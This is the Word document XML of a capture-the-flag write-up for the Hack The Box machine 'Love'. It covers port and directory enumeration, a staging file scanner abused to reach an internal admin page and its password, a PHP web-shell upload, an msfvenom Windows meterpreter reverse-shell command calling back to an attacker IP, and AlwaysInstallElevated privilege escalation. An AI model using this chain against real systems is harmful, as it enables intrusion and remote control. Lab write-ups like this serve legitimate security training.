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D4C6" w14:textId="2DA89311" w:rsidR="0095444B" w:rsidRPr="0095444B" w:rsidRDefault="0095444B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0095444B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EAF27C" w14:textId="627FF13C" w:rsidR="00125D7D" w:rsidRDefault="00A82166">
      <w:r>
        <w:t>Love</w:t>
      </w:r>
      <w:r w:rsidR="0095444B">
        <w:t>.htb 10.10.10.239</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AF5ABA" w14:textId="32CCA035" w:rsidR="0095444B" w:rsidRDefault="0095444B">
      <w:r>
        <w:t>Nmap scan show multi ports open and shows host name/staging name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C0E75" w14:textId="6F2ADB0E" w:rsidR="0095444B" w:rsidRDefault="0095444B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2743183A" wp14:editId="13B979C9">
            <wp:extent cx="5943600" cy="28003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A511" w14:textId="29970BFD" w:rsidR="0095444B" w:rsidRDefault="0095444B"/>
    <w:p w14:paraId="22B3B052" w14:textId="0C109F38" w:rsidR="0095444B" w:rsidRDefault="0095444B">
      <w:r>
        <w:t>Add those to our host file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B8D80B" w14:textId="2EACFB6F" w:rsidR="0095444B" w:rsidRDefault="0095444B">
      <w:r>
        <w:t>Next we will dirsearch the site…. The results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D36A3D2" w14:textId="7AFB46E8" w:rsidR="0095444B" w:rsidRDefault="0095444B">
      <w:r w:rsidRPr="0095444B">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14DC26F3" wp14:editId="74742B4F">
            <wp:extent cx="5943600" cy="4511675"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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6992" w14:textId="4DB3F019" w:rsidR="0095444B" w:rsidRDefault="0095444B">
      <w:r>
        <w:t>Visiting the webpage we get a login for a voting system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0EDA3C" w14:textId="27AE5995" w:rsidR="0095444B" w:rsidRDefault="0095444B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48F5C835" wp14:editId="5291BF41">
            <wp:extent cx="5943600" cy="3028315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6723" w14:textId="77777777" w:rsidR="008751DC" w:rsidRDefault="0095444B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The staging website is a </w:t>
      </w:r>
      <w:r w:rsidR="008751DC">
        <w:t xml:space="preserve">free </w:t>
      </w:r>
      <w:r>
        <w:t>file scann</w:t>
      </w:r>
      <w:r w:rsidR="008751DC">
        <w:t>er.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AF618C" w14:textId="0145B3C1" w:rsidR="0095444B" w:rsidRDefault="008751DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C7EEDF2" wp14:editId="39C2CD2B">
            <wp:extent cx="5943600" cy="234759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44B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC52242" w14:textId="3C220369" w:rsidR="008751DC" w:rsidRDefault="008751DC">
      <w:r>
        <w:t>I tried to scan the local host port 80 and nothing was displayed, but scanning localhost:5000 displays admin login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE99886" w14:textId="1C283C31" w:rsidR="008751DC" w:rsidRDefault="008751DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E99F625" wp14:editId="10C53CB1">
            <wp:extent cx="5943600" cy="328168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7EA9" w14:textId="4437D50A" w:rsidR="008751DC" w:rsidRDefault="008751DC"/>
    <w:p w14:paraId="2CF4AA97" w14:textId="2409F2E7" w:rsidR="008751DC" w:rsidRDefault="008751DC">
      <w:r w:rsidRPr="008751DC">
        <w:t>Vote Admin Creds admin: @LoveIsInTheAir!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB84450" w14:textId="01C5637C" w:rsidR="008751DC" w:rsidRPr="008751DC" w:rsidRDefault="008751DC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Foothold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9D9A0E" w14:textId="54DD209C" w:rsidR="008751DC" w:rsidRDefault="008751DC">
      <w:r>
        <w:t>Using these credentials, we can get into love.htb voting system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0043BCA9" w14:textId="1D4FB0B1" w:rsidR="008751DC" w:rsidRDefault="008751DC">
      <w:r>
        <w:t>Looking around I can add a voter and upload a “photo”. There is no restrictions on which files can be uploaded so Ill upload a shell.php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618B8701" w14:textId="502B4464" w:rsidR="008751DC" w:rsidRDefault="008751DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF2C05E" wp14:editId="3B4138C2">
            <wp:extent cx="5943600" cy="382905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88F8" w14:textId="3926FB9D" w:rsidR="008751DC" w:rsidRDefault="008751DC">
      <w:r>
        <w:t>After going to the shell file we can use cmd to test if its working.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278F7C65" w14:textId="2DE6566C" w:rsidR="008751DC" w:rsidRDefault="008751DC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="074DBCDB" wp14:editId="4FE39183">
            <wp:extent cx="5943600" cy="1370330"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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3011" w14:textId="3B0937A8" w:rsidR="00506634" w:rsidRDefault="00506634">
      <w:r w:rsidRPr="00506634">
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp lport=4444 lhost=10.10.16.6 -f exe -o shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA8EA7E" w14:textId="1516D8C9" w:rsidR="002A72ED" w:rsidRDefault="002A72ED">
      <w:r>
        <w:t>Do back and create another new user and upload shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F150DE" w14:textId="3A4CC130" w:rsidR="002A72ED" w:rsidRDefault="002A72ED">
      <w:r>
        <w:t>start msfconsole use exploit/multi/handler and enter in info for lhost and port. Run handler. Then go back to site and enter cmd=start shell.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9C2D26" w14:textId="76EFDDDB" w:rsidR="002A72ED" w:rsidRDefault="002A72ED">
      <w:r>
        <w:t xml:space="preserve">Should get meterpreter session </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1F14C4" w14:textId="58C4BF98" w:rsidR="002A72ED" w:rsidRDefault="002A72ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B0D8FCE" wp14:editId="297A6D6D">
            <wp:extent cx="5943600" cy="2336800"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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374B" w14:textId="6021E4B9" w:rsidR="00BE5963" w:rsidRDefault="002A72ED">
      <w:r>
        <w:t xml:space="preserve">After getting user.txt. </w:t>
      </w:r>
      <w:r w:rsidR="00BE5963">
        <w:t xml:space="preserve"> box has </w:t>
      </w:r>
      <w:r w:rsidR="00BE5963" w:rsidRPr="00BE5963">
        <w:t>AlwaysInstallElevated</w:t>
      </w:r>
      <w:r w:rsidR="00BE5963">
        <w:t xml:space="preserve"> enable on it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF711A0" w14:textId="0F506567" w:rsidR="002A72ED" w:rsidRDefault="002A72ED">
      <w:r>
        <w:t>Background the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4ECBE1" w14:textId="31F91304" w:rsidR="00BE5963" w:rsidRPr="00BE5963" w:rsidRDefault="00BE5963">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Escalate Privs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791B21D3" w14:textId="2F61DC0F" w:rsidR="002A72ED" w:rsidRDefault="002A72ED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56716573" wp14:editId="6B2CC3D6">
            <wp:extent cx="5943600" cy="2571115"/>
            <wp:effectExtent l="0" t="0" r="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F3E7" w14:textId="4A7A3881" w:rsidR="002A72ED" w:rsidRDefault="002A72ED"/>
    <w:p w14:paraId="4DD69038" w14:textId="453E4F18" w:rsidR="002A72ED" w:rsidRDefault="00BE5963">
      <w:r>
        <w:t>Should now be admin, cat root.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF1BC52" w14:textId="0DD246DF" w:rsidR="002A72ED" w:rsidRDefault="002A72ED"/>
    <w:p w14:paraId="56F58B83" w14:textId="24F60AC4" w:rsidR="002A72ED" w:rsidRDefault="002A72ED"/>
    <w:p w14:paraId="0E07C371" w14:textId="3E9F6AF2" w:rsidR="002A72ED" w:rsidRDefault="002A72ED">
      <w:r w:rsidRPr="002A72ED">
        <w:t>https://app.hackthebox.eu/profile/280458</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002A7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66"/>
    <w:rsid w:val="002A72ED"/>
    <w:rsid w:val="00506634"/>
    <w:rsid w:val="008751DC"/>
    <w:rsid w:val="0095444B"/>
    <w:rsid w:val="009E5464"/>
    <w:rsid w:val="00A82166"/>
    <w:rsid w:val="00BE5963"/>
    <w:rsid w:val="00C1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6A97"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{61B59D9F-3EB5-4B67-8569-AC74CD7D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Uding</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Justin Uding</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-11T14:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-11T15:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>